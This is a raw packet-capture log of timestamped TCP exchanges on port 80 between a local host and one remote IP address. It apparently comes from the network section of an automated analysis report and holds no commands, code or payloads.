                                        Dec 12, 2024 23:09:07.487747908 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.488327980 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.488450050 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.488451004 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.488492012 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.489206076 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.489244938 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.489337921 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.490051031 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.490096092 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.490101099 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.490437984 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.490905046 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.490947962 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.490984917 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.491094112 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.491746902 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.491914034 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.491935968 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.491954088 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.492619038 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.492676973 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.492746115 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.492784977 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.493472099 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.493602991 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.493635893 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.493654013 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.494335890 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.494378090 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.494442940 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.494966984 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.495219946 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.495373964 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.495412111 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.496093988 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.496185064 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.496217966 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.496929884 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.496978045 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.497064114 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.497103930 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.497771978 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.497848988 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.497859001 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.497889996 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.498641968 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.498706102 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.498882055 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.498927116 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.499552965 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.499619961 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.499664068 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.500365973 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.500406027 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.500475883 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.500555038 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.501233101 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.501282930 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.501313925 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.501352072 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.502068996 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.502109051 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.502147913 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.502187014 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.502903938 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.503009081 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.503041983 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.503895998 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.503964901 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.503971100 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.503998041 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.504638910 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.504681110 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.504750013 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.504945040 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.505494118 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.505553007 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.505578041 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.505609989 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.506463051 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.506480932 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.506519079 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.609117031 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.609196901 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.609214067 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.609249115 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.609474897 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.609518051 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.609606028 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.609648943 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.610316992 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.610373974 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.610425949 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.610467911 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.611228943 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.611272097 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.611290932 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.611475945 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.612077951 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.612174988 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.612225056 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.612895966 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.612967014 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.613028049 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.613085985 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.613766909 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.613828897 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.613889933 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.613934994 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.614639044 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.614695072 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.614737988 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.615458965 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.615509987 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.615623951 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.615669966 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.616381884 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.616393089 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.616440058 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.616962910 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.617232084 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.617274046 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.617347002 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.617924929 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.618148088 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.618293047 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.618333101 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.618921995 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.618968010 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.619029999 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.619065046 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.619784117 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.619849920 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.619859934 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.619900942 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.620620012 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.620728016 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.620773077 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.621561050 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.621607065 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.621646881 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.621681929 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.622332096 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.622375011 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.622458935 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.622493029 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.623209000 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.623311043 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.623341084 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.623456001 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.624068975 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.624111891 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.624159098 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.624202013 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.624902010 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.624982119 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.625021935 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.625073910 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.625787973 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.625861883 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.625911951 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.625976086 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.626626015 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.626697063 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.626732111 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.626815081 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.627507925 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.627557993 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.627610922 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.627696991 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.628318071 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.628360033 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.650620937 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.650671005 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.650731087 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.650774002 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.651020050 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.651061058 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.651154995 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.651195049 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.651896954 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.651935101 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.652079105 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.652112961 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.652987003 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.654194117 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.676413059 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.676558971 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.676618099 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.676795959 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.676928997 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.676937103 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.676985979 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.677660942 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.677778959 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.677822113 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.678502083 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.678638935 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.678679943 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.679374933 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.679428101 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.679459095 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.679493904 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.680243969 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.680319071 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.680349112 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.680408001 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.681082010 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.681127071 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.681159973 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.681694984 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.681962967 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.682010889 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.682049990 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.682089090 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.682790995 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.682830095 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.682944059 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.682984114 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.683640003 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.683725119 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.683752060 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.683780909 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.684581995 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.684628963 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.684708118 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.684746027 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.685400963 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.685450077 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.685607910 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.685647964 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.686239958 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.686369896 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.686413050 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.687122107 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.687218904 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.687218904 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.687258959 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.687956095 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.687999964 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.688033104 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.688071966 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.688807011 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.688855886 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.688930988 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.688988924 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.689649105 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.689691067 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.689735889 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.689820051 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.690515041 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.690570116 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.690613031 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.690640926 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.691354036 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.691420078 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.691478968 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.691596985 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.692234039 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.692279100 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.692352057 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.692415953 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.693074942 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.693115950 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.693176985 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.693216085 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.693962097 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.694005966 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.694062948 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.694129944 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.694788933 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.694833994 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.694912910 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.694969893 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.695667028 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.695708036 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.695713043 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.695749998 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.696517944 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.696635962 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.696681023 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.697385073 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.697427034 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.697458982 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.697501898 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.698252916 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.698312044 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.698343039 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.698358059 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.733159065 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.800904036 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.800935030 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.800946951 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.800970078 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.801107883 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.801141024 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.801369905 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.801409960 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.802005053 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.802056074 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.802129984 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.802167892 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.802870989 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.802912951 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.803018093 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.803057909 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.803869963 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.803913116 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.804054022 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.804090977 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.804593086 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.804649115 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.804670095 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.804709911 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.805483103 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.805628061 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.805674076 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.806277990 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.806447029 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.806484938 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.807152987 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.807203054 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.807254076 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.807291985 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.808003902 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.808042049 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.808096886 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.808608055 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.808897018 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.809025049 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.809056044 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.809823036 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.809880972 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.809948921 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.810533047 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.810729027 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.810852051 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.810888052 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.811573982 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.811618090 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.811676979 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.811707973 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.812381983 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.812480927 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.812513113 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.813133955 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.813179970 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.813285112 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.813317060 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.814073086 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.814148903 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.814172983 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.814193964 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.814886093 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.815009117 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.815051079 CET4974480192.168.2.480.82.65.70
